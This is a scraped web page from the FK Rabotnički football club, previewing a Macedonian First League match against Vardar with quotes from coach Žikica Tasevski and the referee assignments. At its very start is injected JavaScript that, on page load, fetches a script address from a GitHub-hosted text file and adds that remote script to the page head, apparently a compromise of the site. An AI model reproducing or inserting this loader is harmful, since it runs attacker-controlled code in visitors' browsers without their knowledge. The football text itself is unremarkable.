;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Тасевски: Респект за Вардар, но одиме по бодови во Маџари
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Тасевски: Респект за Вардар, но одиме по бодови во Маџари

По репрезентативната пауза, нов голем предизвик за нашиот тим. Работнички утре (13 часот) ќе му гостува на Вардар на стадионот „Борис Трајковски“ во Маџари, во рамките на 15.коло од Првата фудбалска лига.

Тренерот Жикица Тасевски вели дека Работнички максимално го респектира градскиот ривал, но и посакува триумф против „црвено-црните“.

„Вардар е најголемиот бренд во македонскиот фудбал, клубот секогаш заслужува максимален респект, но исто така секогаш е и голема мотивација за противниците. Не се сомневам дека нашите фудбалери ќе имаат огромен мотив за игра. Ќе биде тежок дуел, со оглед и на временските услови, но подготвени сме за предизвикот и одиме да освоиме бодови“, порачува шефот на стручниот штаб.

Главен судија на натпреварот ќе биде Александар Ставрев, а ќе му помагаат Марјан Кировски и Дејан Костадинов од Скопје. Четврти судија е Филип Ивковски. За делегат на натпреварот е одреден Милорад Тренчевски (Куманово), а контролор на судењето ќе биде Благој Шуклев (Стојаково).